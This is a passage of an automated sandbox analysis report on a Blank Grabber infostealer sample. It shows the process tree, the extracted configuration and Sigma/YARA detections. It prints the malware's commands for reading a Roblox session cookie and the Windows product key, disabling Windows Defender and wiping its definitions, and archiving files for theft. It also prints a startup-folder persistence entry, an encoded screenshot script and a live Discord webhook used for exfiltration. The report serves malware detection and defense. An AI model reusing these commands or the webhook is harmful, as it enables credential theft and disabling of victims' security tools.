      • cmd.exe (PID: 8256 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8140 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 8568 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 8636 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8280 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8664 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8728 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8436 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8972 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8880 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9076 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8944 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7600 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8076 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7936 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1298867906041479188/X0YmXSYYuFGsCIlZL1CQlv_GeIoIWc3S1cksX7_7_e4Onj-TjaVqNzNpf_yEZ3AJvNBM"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI73082\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.2102475831.000001B5FEEF0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000002.2105351723.000001B5FDA10000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000000.00000003.1707785964.000002641A645000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000000.00000003.1707785964.000002641A643000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000002.2105871679.000001B5FDF50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\program.exe'", ProcessId: 7376, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7384, ProcessName: cmd.exe
              Sigma detected: Rar Usage with Password and Compression Level
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\program.exe", ParentImage: C:\Users\user\Desktop\program.exe, ParentProcessId: 7324, ParentProcessName: program.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *", ProcessId: 7864, ProcessName: cmd.exe
              Sigma detected: Suspicious Encoded PowerShell Command Line
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious PowerShell Encoded Command Patterns
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Suspicious Startup Folder Persistence
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\program.exe, ProcessId: 7324, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4A